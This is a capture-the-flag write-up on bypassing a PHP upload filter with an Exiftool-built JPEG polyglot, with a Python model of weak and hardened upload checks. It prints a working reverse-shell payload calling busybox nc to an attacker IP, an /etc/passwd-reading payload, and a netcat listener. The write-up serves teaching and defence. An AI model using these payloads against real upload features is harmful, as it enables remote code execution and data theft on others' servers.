Turning a JPG Into a Reverse Shell With Exiftool

Yesterday I played a CTF in order to improve my OSINT skills and I arrived at a stage where I needed a reverse shell. Through OSINT techniques I got access to the source code of the application (written in PHP). The app had an upload feature that I was able to access, the OS behind it was Ubuntu 20, it seemed easy… But the upload feature had a MIME filter: only JPG, JPEG, PNG and BMP; however, there was no check on the extension, so, in theory, if I had 4 magic bytes added at the beginning of a reverse shell file, my upload would have passed.

Trying a reverse shell file with hexeditor

I created my reverse shell file from bash,

echo "AAAA <?php system('busybox nc [attacking_ip] [listener_port] -e /bin/bash'); ?>" > rev.php

opened it with hexeditor, replaced the first four bytes with FF D8 FF E0 and sent the upload.

The response was prompt: “Only JPG, JPEG, PNG and BMP files are allowed”.

I changed the Content-Type in the upload form into image/jpg and tried again. Same thing…

Polyglot image to the rescue

I decided to try with a polyglot so I created a small jpg image.

convert -size 10x10 xc:white test.jpg

To see whether it worked, I did not go straight for the reverse shell but first tested whether I could get /etc/passwd displayed, so I added a payload for that using the useful Exiftool.

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" test.jpg -o polyglot.php

I uploaded the file polyglot.php and it was uploaded successfully. I accessed it and /etc/passwd was nicely, or almost nicely, displayed.

Getting my reverse shell was already trivial.

I fired up my listener rlwrap nc -nvlp 4444 (I like using rlwrap..) and I modified the payload.

exiftool -Comment="<?php system('busybox nc [attacker_ip] [listener_port] -e /bin/bash'); ?>" test.jpg -o polyglot1.php

After the upload and a GET request on polyglot1.php I was www-data on the Ubuntu machine.
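The two outcomes above (a file with only the magic bytes glued on was refused, while the Exiftool polyglot went through) are what a filter produces when it validates image structure but never looks at the extension. The script below is an added example, not code from the write-up or from the CTF application. It models that weak check in Python next to a hardened one (extension allow-list, well-formed JPEG marker stream, and no PHP open tag in any metadata segment) and runs both over constructed samples shaped like rev.php, polyglot.php and a clean photo. That the CTF filter worked by structural validation is my assumption; the write-up only reports the results.

```python
import re

# Extensions the upload handler accepts; everything else is refused outright.
ALLOWED_EXT = {"jpg", "jpeg", "png", "bmp"}
# PHP open tags: "<?php" and the short echo tag "<?=".
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def jpeg_segments(data: bytes):
    """Walk the JPEG marker stream and yield (marker, payload) for every
    length-carrying segment up to SOS/EOI. Raises ValueError for anything that
    is not a well-formed marker stream (structure only, like getimagesize())."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                                # fill byte, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):                        # EOI or SOS: metadata is over
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:      # standalone markers
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length %d at offset %d" % (length, pos))
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length
    raise ValueError("no EOI/SOS before end of data")


def structurally_valid_jpeg(data: bytes) -> bool:
    try:
        for _ in jpeg_segments(data):
            pass
        return True
    except ValueError:
        return False


def weak_upload_check(filename: str, data: bytes) -> bool:
    """Assumed model of the CTF filter: the bytes must parse as an image,
    the file name is ignored. A valid JPEG with PHP in a COM segment passes."""
    return structurally_valid_jpeg(data)


def hardened_upload_check(filename: str, data: bytes):
    """Extension allow-list first, then structure, then a scan of every
    metadata segment for a PHP open tag. Returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not in allow-list"
    if not structurally_valid_jpeg(data):
        return False, "not a well-formed JPEG"
    for marker, payload in jpeg_segments(data):
        if PHP_OPEN_TAG.search(payload):
            return False, "PHP open tag in segment 0x%02X" % marker
    return True, "accepted"


def make_jpeg(comment: bytes = b"") -> bytes:
    """Constructed sample: SOI, a JFIF APP0 segment, an optional COM segment
    (what exiftool -Comment writes) and EOI. No scan data, enough for the parser."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    out = b"\xff\xd8\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0
    if comment:
        out += b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    return out + b"\xff\xd9"


# Constructed samples; the PHP bodies are placeholders, not the write-up's payloads.
SAMPLES = {
    "rev.php": b"\xff\xd8\xff\xe0" + b" <?php echo 'hi'; ?>",   # magic bytes glued on
    "polyglot.php": make_jpeg(b"<?php echo 'hi'; ?>"),        # exiftool -Comment style
    "photo.jpg": make_jpeg(b"shot on holiday"),                # clean upload
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print("%-13s weak=%-5s hardened=%s" % (name, weak_upload_check(name, blob),
                                               hardened_upload_check(name, blob)))
```

Scanning metadata for PHP tags is a detection signal, not the whole fix: an upload handler should also re-encode the image through an image library (which drops the COM segment entirely), store it under a server-chosen name, and serve it from a directory where the web server never executes scripts.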

Becoming root?

The privilege escalation part was not really interesting as the password of one of the users on the machine was discovered via OSINT and it had sudo privileges.

A final note

The magic bytes technique might not work all the time even if everything gives the impression that it should, and the same could be true for the polyglot technique as well. Having them both in my arsenal got me 2 more flags from an otherwise pretty easy CTF.

Copyright © 2025 Cezar Nicolescu